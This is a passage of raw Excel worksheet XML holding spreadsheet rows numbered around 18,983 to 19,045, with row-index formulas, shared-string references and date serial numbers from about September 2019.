    <row r="18983" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18983">
        <f t="shared" si="296"/>
        <v>18982</v>
      </c>
      <c r="B18983">
        <v>3982</v>
      </c>
      <c r="C18983" t="s">
        <v>25497</v>
      </c>
      <c r="D18983" s="1">
        <v>43715</v>
      </c>
      <c r="E18983" t="s">
        <v>30621</v>
      </c>
      <c r="F18983" t="s">
        <v>10526</v>
      </c>
      <c r="G18983" t="s">
        <v>30622</v>
      </c>
    </row>
    <row r="18984" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18984">
        <f t="shared" si="296"/>
        <v>18983</v>
      </c>
      <c r="B18984">
        <v>3983</v>
      </c>
      <c r="C18984" t="s">
        <v>25497</v>
      </c>
      <c r="D18984" s="1">
        <v>43711</v>
      </c>
      <c r="E18984" t="s">
        <v>30623</v>
      </c>
      <c r="F18984" t="s">
        <v>10526</v>
      </c>
      <c r="G18984" t="s">
        <v>30624</v>
      </c>
    </row>
    <row r="18985" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18985">
        <f t="shared" si="296"/>
        <v>18984</v>
      </c>
      <c r="B18985">
        <v>3984</v>
      </c>
      <c r="C18985" t="s">
        <v>25497</v>
      </c>
      <c r="D18985" s="1">
        <v>43731</v>
      </c>
      <c r="E18985" t="s">
        <v>30625</v>
      </c>
      <c r="F18985" t="s">
        <v>10021</v>
      </c>
      <c r="G18985" t="s">
        <v>30626</v>
      </c>
    </row>
    <row r="18986" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18986">
        <f t="shared" si="296"/>
        <v>18985</v>
      </c>
      <c r="B18986">
        <v>3985</v>
      </c>
      <c r="C18986" t="s">
        <v>25497</v>
      </c>
      <c r="D18986" s="1">
        <v>43727</v>
      </c>
      <c r="E18986" t="s">
        <v>30627</v>
      </c>
      <c r="F18986" t="s">
        <v>9975</v>
      </c>
      <c r="G18986" t="s">
        <v>30628</v>
      </c>
    </row>
    <row r="18987" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18987">
        <f t="shared" si="296"/>
        <v>18986</v>
      </c>
      <c r="B18987">
        <v>3986</v>
      </c>
      <c r="C18987" t="s">
        <v>25497</v>
      </c>
      <c r="D18987" s="1">
        <v>43718</v>
      </c>
      <c r="E18987" t="s">
        <v>25517</v>
      </c>
      <c r="F18987" t="s">
        <v>9975</v>
      </c>
      <c r="G18987" t="s">
        <v>30629</v>
      </c>
    </row>
    <row r="18988" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18988">
        <f t="shared" si="296"/>
        <v>18987</v>
      </c>
      <c r="B18988">
        <v>3987</v>
      </c>
      <c r="C18988" t="s">
        <v>25497</v>
      </c>
      <c r="D18988" s="1">
        <v>43710</v>
      </c>
      <c r="E18988" t="s">
        <v>28366</v>
      </c>
      <c r="F18988" t="s">
        <v>9975</v>
      </c>
      <c r="G18988" t="s">
        <v>30630</v>
      </c>
    </row>
    <row r="18989" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18989">
        <f t="shared" si="296"/>
        <v>18988</v>
      </c>
      <c r="B18989">
        <v>3988</v>
      </c>
      <c r="C18989" t="s">
        <v>25497</v>
      </c>
      <c r="D18989" s="1">
        <v>43720</v>
      </c>
      <c r="E18989" t="s">
        <v>27044</v>
      </c>
      <c r="F18989" t="s">
        <v>9975</v>
      </c>
      <c r="G18989" t="s">
        <v>30631</v>
      </c>
    </row>
    <row r="18990" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18990">
        <f t="shared" si="296"/>
        <v>18989</v>
      </c>
      <c r="B18990">
        <v>3989</v>
      </c>
      <c r="C18990" t="s">
        <v>25497</v>
      </c>
      <c r="D18990" s="1">
        <v>43732</v>
      </c>
      <c r="E18990" t="s">
        <v>30632</v>
      </c>
      <c r="F18990" t="s">
        <v>9975</v>
      </c>
      <c r="G18990" t="s">
        <v>30633</v>
      </c>
    </row>
    <row r="18991" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18991">
        <f t="shared" si="296"/>
        <v>18990</v>
      </c>
      <c r="B18991">
        <v>3990</v>
      </c>
      <c r="C18991" t="s">
        <v>25497</v>
      </c>
      <c r="D18991" s="1">
        <v>43726</v>
      </c>
      <c r="E18991" t="s">
        <v>30634</v>
      </c>
      <c r="F18991" t="s">
        <v>9975</v>
      </c>
      <c r="G18991" t="s">
        <v>30635</v>
      </c>
    </row>
    <row r="18992" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18992">
        <f t="shared" si="296"/>
        <v>18991</v>
      </c>
      <c r="B18992">
        <v>3991</v>
      </c>
      <c r="C18992" t="s">
        <v>25497</v>
      </c>
      <c r="D18992" s="1">
        <v>43713</v>
      </c>
      <c r="E18992" t="s">
        <v>30636</v>
      </c>
      <c r="F18992" t="s">
        <v>10526</v>
      </c>
      <c r="G18992" t="s">
        <v>30637</v>
      </c>
    </row>
    <row r="18993" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18993">
        <f t="shared" si="296"/>
        <v>18992</v>
      </c>
      <c r="B18993">
        <v>3992</v>
      </c>
      <c r="C18993" t="s">
        <v>25497</v>
      </c>
      <c r="D18993" s="1">
        <v>43733</v>
      </c>
      <c r="E18993" t="s">
        <v>25517</v>
      </c>
      <c r="F18993" t="s">
        <v>9975</v>
      </c>
      <c r="G18993" t="s">
        <v>30638</v>
      </c>
    </row>
    <row r="18994" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18994">
        <f t="shared" si="296"/>
        <v>18993</v>
      </c>
      <c r="B18994">
        <v>3993</v>
      </c>
      <c r="C18994" t="s">
        <v>25497</v>
      </c>
      <c r="D18994" s="1">
        <v>43724</v>
      </c>
      <c r="F18994" t="s">
        <v>9975</v>
      </c>
      <c r="G18994" t="s">
        <v>30639</v>
      </c>
    </row>
    <row r="18995" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18995">
        <f t="shared" si="296"/>
        <v>18994</v>
      </c>
      <c r="B18995">
        <v>3994</v>
      </c>
      <c r="C18995" t="s">
        <v>25497</v>
      </c>
      <c r="D18995" s="1">
        <v>43710</v>
      </c>
      <c r="E18995" t="s">
        <v>25509</v>
      </c>
      <c r="F18995" t="s">
        <v>10021</v>
      </c>
      <c r="G18995" t="s">
        <v>30640</v>
      </c>
    </row>
    <row r="18996" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18996">
        <f t="shared" si="296"/>
        <v>18995</v>
      </c>
      <c r="B18996">
        <v>3995</v>
      </c>
      <c r="C18996" t="s">
        <v>25497</v>
      </c>
      <c r="D18996" s="1">
        <v>43718</v>
      </c>
      <c r="E18996" t="s">
        <v>30641</v>
      </c>
      <c r="F18996" t="s">
        <v>9975</v>
      </c>
      <c r="G18996" t="s">
        <v>30642</v>
      </c>
    </row>
    <row r="18997" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18997">
        <f t="shared" si="296"/>
        <v>18996</v>
      </c>
      <c r="B18997">
        <v>3996</v>
      </c>
      <c r="C18997" t="s">
        <v>25497</v>
      </c>
      <c r="D18997" s="1">
        <v>43737</v>
      </c>
      <c r="E18997" t="s">
        <v>26607</v>
      </c>
      <c r="F18997" t="s">
        <v>9975</v>
      </c>
      <c r="G18997" t="s">
        <v>30643</v>
      </c>
    </row>
    <row r="18998" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18998">
        <f t="shared" si="296"/>
        <v>18997</v>
      </c>
      <c r="B18998">
        <v>3997</v>
      </c>
      <c r="C18998" t="s">
        <v>25497</v>
      </c>
      <c r="D18998" s="1">
        <v>43719</v>
      </c>
      <c r="E18998" t="s">
        <v>30644</v>
      </c>
      <c r="F18998" t="s">
        <v>9975</v>
      </c>
      <c r="G18998" t="s">
        <v>30645</v>
      </c>
    </row>
    <row r="18999" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A18999">
        <f t="shared" si="296"/>
        <v>18998</v>
      </c>
      <c r="B18999">
        <v>3998</v>
      </c>
      <c r="C18999" t="s">
        <v>25497</v>
      </c>
      <c r="D18999" s="1">
        <v>43721</v>
      </c>
      <c r="F18999" t="s">
        <v>9975</v>
      </c>
      <c r="G18999" t="s">
        <v>30646</v>
      </c>
    </row>
    <row r="19000" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19000">
        <f t="shared" si="296"/>
        <v>18999</v>
      </c>
      <c r="B19000">
        <v>3999</v>
      </c>
      <c r="C19000" t="s">
        <v>25497</v>
      </c>
      <c r="D19000" s="1">
        <v>43712</v>
      </c>
      <c r="E19000" t="s">
        <v>25517</v>
      </c>
      <c r="F19000" t="s">
        <v>9975</v>
      </c>
      <c r="G19000" t="s">
        <v>30647</v>
      </c>
    </row>
    <row r="19001" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19001">
        <f t="shared" si="296"/>
        <v>19000</v>
      </c>
      <c r="B19001">
        <v>4000</v>
      </c>
      <c r="C19001" t="s">
        <v>25497</v>
      </c>
      <c r="D19001" s="1">
        <v>43708</v>
      </c>
      <c r="E19001" t="s">
        <v>25512</v>
      </c>
      <c r="F19001" t="s">
        <v>9975</v>
      </c>
      <c r="G19001" t="s">
        <v>30648</v>
      </c>
    </row>
    <row r="19002" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19002">
        <f t="shared" si="296"/>
        <v>19001</v>
      </c>
      <c r="B19002">
        <v>4001</v>
      </c>
      <c r="C19002" t="s">
        <v>25497</v>
      </c>
      <c r="D19002" s="1">
        <v>43733</v>
      </c>
      <c r="E19002" t="s">
        <v>30649</v>
      </c>
      <c r="F19002" t="s">
        <v>9975</v>
      </c>
      <c r="G19002" t="s">
        <v>30650</v>
      </c>
    </row>
    <row r="19003" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19003">
        <f t="shared" si="296"/>
        <v>19002</v>
      </c>
      <c r="B19003">
        <v>4002</v>
      </c>
      <c r="C19003" t="s">
        <v>25497</v>
      </c>
      <c r="D19003" s="1">
        <v>43712</v>
      </c>
      <c r="E19003" t="s">
        <v>25592</v>
      </c>
      <c r="F19003" t="s">
        <v>9975</v>
      </c>
      <c r="G19003" t="s">
        <v>30651</v>
      </c>
    </row>
    <row r="19004" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19004">
        <f t="shared" si="296"/>
        <v>19003</v>
      </c>
      <c r="B19004">
        <v>4003</v>
      </c>
      <c r="C19004" t="s">
        <v>25497</v>
      </c>
      <c r="D19004" s="1">
        <v>43735</v>
      </c>
      <c r="E19004" t="s">
        <v>28702</v>
      </c>
      <c r="F19004" t="s">
        <v>9975</v>
      </c>
      <c r="G19004" t="s">
        <v>30652</v>
      </c>
    </row>
    <row r="19005" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19005">
        <f t="shared" si="296"/>
        <v>19004</v>
      </c>
      <c r="B19005">
        <v>4004</v>
      </c>
      <c r="C19005" t="s">
        <v>25497</v>
      </c>
      <c r="D19005" s="1">
        <v>43731</v>
      </c>
      <c r="E19005" t="s">
        <v>30653</v>
      </c>
      <c r="F19005" t="s">
        <v>10526</v>
      </c>
      <c r="G19005" t="s">
        <v>30654</v>
      </c>
    </row>
    <row r="19006" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19006">
        <f t="shared" si="296"/>
        <v>19005</v>
      </c>
      <c r="B19006">
        <v>4005</v>
      </c>
      <c r="C19006" t="s">
        <v>25497</v>
      </c>
      <c r="D19006" s="1">
        <v>43719</v>
      </c>
      <c r="E19006" t="s">
        <v>30655</v>
      </c>
      <c r="F19006" t="s">
        <v>10526</v>
      </c>
      <c r="G19006" t="s">
        <v>30656</v>
      </c>
    </row>
    <row r="19007" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19007">
        <f t="shared" si="296"/>
        <v>19006</v>
      </c>
      <c r="B19007">
        <v>4006</v>
      </c>
      <c r="C19007" t="s">
        <v>25497</v>
      </c>
      <c r="D19007" s="1">
        <v>43713</v>
      </c>
      <c r="E19007" t="s">
        <v>30657</v>
      </c>
      <c r="F19007" t="s">
        <v>9975</v>
      </c>
      <c r="G19007" t="s">
        <v>30658</v>
      </c>
    </row>
    <row r="19008" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19008">
        <f t="shared" si="296"/>
        <v>19007</v>
      </c>
      <c r="B19008">
        <v>4007</v>
      </c>
      <c r="C19008" t="s">
        <v>25497</v>
      </c>
      <c r="D19008" s="1">
        <v>43726</v>
      </c>
      <c r="E19008" t="s">
        <v>19640</v>
      </c>
      <c r="F19008" t="s">
        <v>9975</v>
      </c>
      <c r="G19008" t="s">
        <v>30659</v>
      </c>
    </row>
    <row r="19009" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19009">
        <f t="shared" si="296"/>
        <v>19008</v>
      </c>
      <c r="B19009">
        <v>4008</v>
      </c>
      <c r="C19009" t="s">
        <v>25497</v>
      </c>
      <c r="D19009" s="1">
        <v>43719</v>
      </c>
      <c r="E19009" t="s">
        <v>25517</v>
      </c>
      <c r="F19009" t="s">
        <v>9975</v>
      </c>
      <c r="G19009" t="s">
        <v>30660</v>
      </c>
    </row>
    <row r="19010" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19010">
        <f t="shared" si="296"/>
        <v>19009</v>
      </c>
      <c r="B19010">
        <v>4009</v>
      </c>
      <c r="C19010" t="s">
        <v>25497</v>
      </c>
      <c r="D19010" s="1">
        <v>43709</v>
      </c>
      <c r="F19010" t="s">
        <v>9975</v>
      </c>
      <c r="G19010" t="s">
        <v>30661</v>
      </c>
    </row>
    <row r="19011" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19011">
        <f t="shared" ref="A19011:A19074" si="297">+ROW(A19010)</f>
        <v>19010</v>
      </c>
      <c r="B19011">
        <v>4010</v>
      </c>
      <c r="C19011" t="s">
        <v>25497</v>
      </c>
      <c r="D19011" s="1">
        <v>43720</v>
      </c>
      <c r="F19011" t="s">
        <v>9975</v>
      </c>
      <c r="G19011" t="s">
        <v>30662</v>
      </c>
    </row>
    <row r="19012" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19012">
        <f t="shared" si="297"/>
        <v>19011</v>
      </c>
      <c r="B19012">
        <v>4011</v>
      </c>
      <c r="C19012" t="s">
        <v>25497</v>
      </c>
      <c r="D19012" s="1">
        <v>43734</v>
      </c>
      <c r="F19012" t="s">
        <v>9975</v>
      </c>
      <c r="G19012" t="s">
        <v>30663</v>
      </c>
    </row>
    <row r="19013" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19013">
        <f t="shared" si="297"/>
        <v>19012</v>
      </c>
      <c r="B19013">
        <v>4012</v>
      </c>
      <c r="C19013" t="s">
        <v>25497</v>
      </c>
      <c r="D19013" s="1">
        <v>43723</v>
      </c>
      <c r="E19013" t="s">
        <v>25881</v>
      </c>
      <c r="F19013" t="s">
        <v>9975</v>
      </c>
      <c r="G19013" t="s">
        <v>30664</v>
      </c>
    </row>
    <row r="19014" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19014">
        <f t="shared" si="297"/>
        <v>19013</v>
      </c>
      <c r="B19014">
        <v>4013</v>
      </c>
      <c r="C19014" t="s">
        <v>25497</v>
      </c>
      <c r="D19014" s="1">
        <v>43735</v>
      </c>
      <c r="F19014" t="s">
        <v>9975</v>
      </c>
      <c r="G19014" t="s">
        <v>30665</v>
      </c>
    </row>
    <row r="19015" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19015">
        <f t="shared" si="297"/>
        <v>19014</v>
      </c>
      <c r="B19015">
        <v>4014</v>
      </c>
      <c r="C19015" t="s">
        <v>25497</v>
      </c>
      <c r="D19015" s="1">
        <v>43731</v>
      </c>
      <c r="E19015" t="s">
        <v>25517</v>
      </c>
      <c r="F19015" t="s">
        <v>9975</v>
      </c>
      <c r="G19015" t="s">
        <v>30666</v>
      </c>
    </row>
    <row r="19016" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19016">
        <f t="shared" si="297"/>
        <v>19015</v>
      </c>
      <c r="B19016">
        <v>4015</v>
      </c>
      <c r="C19016" t="s">
        <v>25497</v>
      </c>
      <c r="D19016" s="1">
        <v>43711</v>
      </c>
      <c r="F19016" t="s">
        <v>9975</v>
      </c>
      <c r="G19016" t="s">
        <v>25521</v>
      </c>
    </row>
    <row r="19017" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19017">
        <f t="shared" si="297"/>
        <v>19016</v>
      </c>
      <c r="B19017">
        <v>4016</v>
      </c>
      <c r="C19017" t="s">
        <v>25497</v>
      </c>
      <c r="D19017" s="1">
        <v>43732</v>
      </c>
      <c r="E19017" t="s">
        <v>30667</v>
      </c>
      <c r="F19017" t="s">
        <v>9975</v>
      </c>
      <c r="G19017" t="s">
        <v>30668</v>
      </c>
    </row>
    <row r="19018" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19018">
        <f t="shared" si="297"/>
        <v>19017</v>
      </c>
      <c r="B19018">
        <v>4017</v>
      </c>
      <c r="C19018" t="s">
        <v>25497</v>
      </c>
      <c r="D19018" s="1">
        <v>43718</v>
      </c>
      <c r="E19018" t="s">
        <v>27754</v>
      </c>
      <c r="F19018" t="s">
        <v>9978</v>
      </c>
      <c r="G19018" t="s">
        <v>30669</v>
      </c>
    </row>
    <row r="19019" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19019">
        <f t="shared" si="297"/>
        <v>19018</v>
      </c>
      <c r="B19019">
        <v>4018</v>
      </c>
      <c r="C19019" t="s">
        <v>25497</v>
      </c>
      <c r="D19019" s="1">
        <v>43718</v>
      </c>
      <c r="E19019" t="s">
        <v>26134</v>
      </c>
      <c r="F19019" t="s">
        <v>9975</v>
      </c>
      <c r="G19019" t="s">
        <v>30670</v>
      </c>
    </row>
    <row r="19020" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19020">
        <f t="shared" si="297"/>
        <v>19019</v>
      </c>
      <c r="B19020">
        <v>4019</v>
      </c>
      <c r="C19020" t="s">
        <v>25497</v>
      </c>
      <c r="D19020" s="1">
        <v>43716</v>
      </c>
      <c r="F19020" t="s">
        <v>10526</v>
      </c>
      <c r="G19020" t="s">
        <v>30671</v>
      </c>
    </row>
    <row r="19021" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19021">
        <f t="shared" si="297"/>
        <v>19020</v>
      </c>
      <c r="B19021">
        <v>4020</v>
      </c>
      <c r="C19021" t="s">
        <v>25497</v>
      </c>
      <c r="D19021" s="1">
        <v>43714</v>
      </c>
      <c r="E19021" t="s">
        <v>25707</v>
      </c>
      <c r="F19021" t="s">
        <v>9978</v>
      </c>
      <c r="G19021" t="s">
        <v>30672</v>
      </c>
    </row>
    <row r="19022" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19022">
        <f t="shared" si="297"/>
        <v>19021</v>
      </c>
      <c r="B19022">
        <v>4021</v>
      </c>
      <c r="C19022" t="s">
        <v>25497</v>
      </c>
      <c r="D19022" s="1">
        <v>43717</v>
      </c>
      <c r="E19022" t="s">
        <v>29335</v>
      </c>
      <c r="F19022" t="s">
        <v>9978</v>
      </c>
      <c r="G19022" t="s">
        <v>30673</v>
      </c>
    </row>
    <row r="19023" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19023">
        <f t="shared" si="297"/>
        <v>19022</v>
      </c>
      <c r="B19023">
        <v>4022</v>
      </c>
      <c r="C19023" t="s">
        <v>25497</v>
      </c>
      <c r="D19023" s="1">
        <v>43733</v>
      </c>
      <c r="F19023" t="s">
        <v>9975</v>
      </c>
      <c r="G19023" t="s">
        <v>30674</v>
      </c>
    </row>
    <row r="19024" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19024">
        <f t="shared" si="297"/>
        <v>19023</v>
      </c>
      <c r="B19024">
        <v>4023</v>
      </c>
      <c r="C19024" t="s">
        <v>25497</v>
      </c>
      <c r="D19024" s="1">
        <v>43718</v>
      </c>
      <c r="F19024" t="s">
        <v>9975</v>
      </c>
      <c r="G19024" t="s">
        <v>30675</v>
      </c>
    </row>
    <row r="19025" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19025">
        <f t="shared" si="297"/>
        <v>19024</v>
      </c>
      <c r="B19025">
        <v>4024</v>
      </c>
      <c r="C19025" t="s">
        <v>25497</v>
      </c>
      <c r="D19025" s="1">
        <v>43722</v>
      </c>
      <c r="F19025" t="s">
        <v>10526</v>
      </c>
      <c r="G19025" t="s">
        <v>30676</v>
      </c>
    </row>
    <row r="19026" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19026">
        <f t="shared" si="297"/>
        <v>19025</v>
      </c>
      <c r="B19026">
        <v>4025</v>
      </c>
      <c r="C19026" t="s">
        <v>25497</v>
      </c>
      <c r="D19026" s="1">
        <v>43726</v>
      </c>
      <c r="E19026" t="s">
        <v>30677</v>
      </c>
      <c r="F19026" t="s">
        <v>10526</v>
      </c>
      <c r="G19026" t="s">
        <v>30678</v>
      </c>
    </row>
    <row r="19027" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19027">
        <f t="shared" si="297"/>
        <v>19026</v>
      </c>
      <c r="B19027">
        <v>4026</v>
      </c>
      <c r="C19027" t="s">
        <v>25497</v>
      </c>
      <c r="D19027" s="1">
        <v>43711</v>
      </c>
      <c r="E19027" t="s">
        <v>25512</v>
      </c>
      <c r="F19027" t="s">
        <v>9975</v>
      </c>
      <c r="G19027" t="s">
        <v>30679</v>
      </c>
    </row>
    <row r="19028" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19028">
        <f t="shared" si="297"/>
        <v>19027</v>
      </c>
      <c r="B19028">
        <v>4027</v>
      </c>
      <c r="C19028" t="s">
        <v>25497</v>
      </c>
      <c r="D19028" s="1">
        <v>43737</v>
      </c>
      <c r="E19028" t="s">
        <v>25509</v>
      </c>
      <c r="F19028" t="s">
        <v>9975</v>
      </c>
      <c r="G19028" t="s">
        <v>30680</v>
      </c>
    </row>
    <row r="19029" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19029">
        <f t="shared" si="297"/>
        <v>19028</v>
      </c>
      <c r="B19029">
        <v>4028</v>
      </c>
      <c r="C19029" t="s">
        <v>25497</v>
      </c>
      <c r="D19029" s="1">
        <v>43720</v>
      </c>
      <c r="E19029" t="s">
        <v>30681</v>
      </c>
      <c r="F19029" t="s">
        <v>10021</v>
      </c>
      <c r="G19029" t="s">
        <v>30682</v>
      </c>
    </row>
    <row r="19030" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19030">
        <f t="shared" si="297"/>
        <v>19029</v>
      </c>
      <c r="B19030">
        <v>4029</v>
      </c>
      <c r="C19030" t="s">
        <v>25497</v>
      </c>
      <c r="D19030" s="1">
        <v>43737</v>
      </c>
      <c r="E19030" t="s">
        <v>30683</v>
      </c>
      <c r="F19030" t="s">
        <v>9975</v>
      </c>
      <c r="G19030" t="s">
        <v>30684</v>
      </c>
    </row>
    <row r="19031" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19031">
        <f t="shared" si="297"/>
        <v>19030</v>
      </c>
      <c r="B19031">
        <v>4030</v>
      </c>
      <c r="C19031" t="s">
        <v>25497</v>
      </c>
      <c r="D19031" s="1">
        <v>43724</v>
      </c>
      <c r="E19031" t="s">
        <v>28061</v>
      </c>
      <c r="F19031" t="s">
        <v>9978</v>
      </c>
      <c r="G19031" t="s">
        <v>30685</v>
      </c>
    </row>
    <row r="19032" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19032">
        <f t="shared" si="297"/>
        <v>19031</v>
      </c>
      <c r="B19032">
        <v>4031</v>
      </c>
      <c r="C19032" t="s">
        <v>25497</v>
      </c>
      <c r="D19032" s="1">
        <v>43738</v>
      </c>
      <c r="E19032" t="s">
        <v>30686</v>
      </c>
      <c r="F19032" t="s">
        <v>9975</v>
      </c>
      <c r="G19032" t="s">
        <v>30687</v>
      </c>
    </row>
    <row r="19033" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19033">
        <f t="shared" si="297"/>
        <v>19032</v>
      </c>
      <c r="B19033">
        <v>4032</v>
      </c>
      <c r="C19033" t="s">
        <v>25497</v>
      </c>
      <c r="D19033" s="1">
        <v>43727</v>
      </c>
      <c r="E19033" t="s">
        <v>30688</v>
      </c>
      <c r="F19033" t="s">
        <v>9975</v>
      </c>
      <c r="G19033" t="s">
        <v>30689</v>
      </c>
    </row>
    <row r="19034" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19034">
        <f t="shared" si="297"/>
        <v>19033</v>
      </c>
      <c r="B19034">
        <v>4033</v>
      </c>
      <c r="C19034" t="s">
        <v>25497</v>
      </c>
      <c r="D19034" s="1">
        <v>43720</v>
      </c>
      <c r="F19034" t="s">
        <v>9975</v>
      </c>
      <c r="G19034" t="s">
        <v>30690</v>
      </c>
    </row>
    <row r="19035" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19035">
        <f t="shared" si="297"/>
        <v>19034</v>
      </c>
      <c r="B19035">
        <v>4034</v>
      </c>
      <c r="C19035" t="s">
        <v>25497</v>
      </c>
      <c r="D19035" s="1">
        <v>43725</v>
      </c>
      <c r="E19035" t="s">
        <v>25509</v>
      </c>
      <c r="F19035" t="s">
        <v>10021</v>
      </c>
      <c r="G19035" t="s">
        <v>30691</v>
      </c>
    </row>
    <row r="19036" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19036">
        <f t="shared" si="297"/>
        <v>19035</v>
      </c>
      <c r="B19036">
        <v>4035</v>
      </c>
      <c r="C19036" t="s">
        <v>25497</v>
      </c>
      <c r="D19036" s="1">
        <v>43726</v>
      </c>
      <c r="E19036" t="s">
        <v>25509</v>
      </c>
      <c r="F19036" t="s">
        <v>10021</v>
      </c>
      <c r="G19036" t="s">
        <v>30692</v>
      </c>
    </row>
    <row r="19037" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19037">
        <f t="shared" si="297"/>
        <v>19036</v>
      </c>
      <c r="B19037">
        <v>4036</v>
      </c>
      <c r="C19037" t="s">
        <v>25497</v>
      </c>
      <c r="D19037" s="1">
        <v>43726</v>
      </c>
      <c r="E19037" t="s">
        <v>30693</v>
      </c>
      <c r="F19037" t="s">
        <v>9978</v>
      </c>
      <c r="G19037" t="s">
        <v>30694</v>
      </c>
    </row>
    <row r="19038" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19038">
        <f t="shared" si="297"/>
        <v>19037</v>
      </c>
      <c r="B19038">
        <v>4037</v>
      </c>
      <c r="C19038" t="s">
        <v>25497</v>
      </c>
      <c r="D19038" s="1">
        <v>43726</v>
      </c>
      <c r="E19038" t="s">
        <v>26813</v>
      </c>
      <c r="F19038" t="s">
        <v>9975</v>
      </c>
      <c r="G19038" t="s">
        <v>30695</v>
      </c>
    </row>
    <row r="19039" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19039">
        <f t="shared" si="297"/>
        <v>19038</v>
      </c>
      <c r="B19039">
        <v>4038</v>
      </c>
      <c r="C19039" t="s">
        <v>25497</v>
      </c>
      <c r="D19039" s="1">
        <v>43719</v>
      </c>
      <c r="E19039" t="s">
        <v>28187</v>
      </c>
      <c r="F19039" t="s">
        <v>10526</v>
      </c>
      <c r="G19039" t="s">
        <v>30696</v>
      </c>
    </row>
    <row r="19040" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19040">
        <f t="shared" si="297"/>
        <v>19039</v>
      </c>
      <c r="B19040">
        <v>4039</v>
      </c>
      <c r="C19040" t="s">
        <v>25497</v>
      </c>
      <c r="D19040" s="1">
        <v>43712</v>
      </c>
      <c r="E19040" t="s">
        <v>25774</v>
      </c>
      <c r="F19040" t="s">
        <v>9975</v>
      </c>
      <c r="G19040" t="s">
        <v>30697</v>
      </c>
    </row>
    <row r="19041" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19041">
        <f t="shared" si="297"/>
        <v>19040</v>
      </c>
      <c r="B19041">
        <v>4040</v>
      </c>
      <c r="C19041" t="s">
        <v>25497</v>
      </c>
      <c r="D19041" s="1">
        <v>43723</v>
      </c>
      <c r="F19041" t="s">
        <v>9975</v>
      </c>
      <c r="G19041" t="s">
        <v>30698</v>
      </c>
    </row>
    <row r="19042" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19042">
        <f t="shared" si="297"/>
        <v>19041</v>
      </c>
      <c r="B19042">
        <v>4041</v>
      </c>
      <c r="C19042" t="s">
        <v>25497</v>
      </c>
      <c r="D19042" s="1">
        <v>43712</v>
      </c>
      <c r="E19042" t="s">
        <v>30699</v>
      </c>
      <c r="F19042" t="s">
        <v>9975</v>
      </c>
      <c r="G19042" t="s">
        <v>30700</v>
      </c>
    </row>
    <row r="19043" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19043">
        <f t="shared" si="297"/>
        <v>19042</v>
      </c>
      <c r="B19043">
        <v>4042</v>
      </c>
      <c r="C19043" t="s">
        <v>25497</v>
      </c>
      <c r="D19043" s="1">
        <v>43733</v>
      </c>
      <c r="E19043" t="s">
        <v>25604</v>
      </c>
      <c r="F19043" t="s">
        <v>10021</v>
      </c>
      <c r="G19043" t="s">
        <v>30701</v>
      </c>
    </row>
    <row r="19044" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19044">
        <f t="shared" si="297"/>
        <v>19043</v>
      </c>
      <c r="B19044">
        <v>4043</v>
      </c>
      <c r="C19044" t="s">
        <v>25497</v>
      </c>
      <c r="D19044" s="1">
        <v>43722</v>
      </c>
      <c r="E19044" t="s">
        <v>30702</v>
      </c>
      <c r="F19044" t="s">
        <v>9975</v>
      </c>
      <c r="G19044" t="s">
        <v>30703</v>
      </c>
    </row>
    <row r="19045" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19045">
        <f t="shared" si="297"/>
        <v>19044</v>
      </c>
      <c r="B19045">
        <v>4044</v>
      </c>
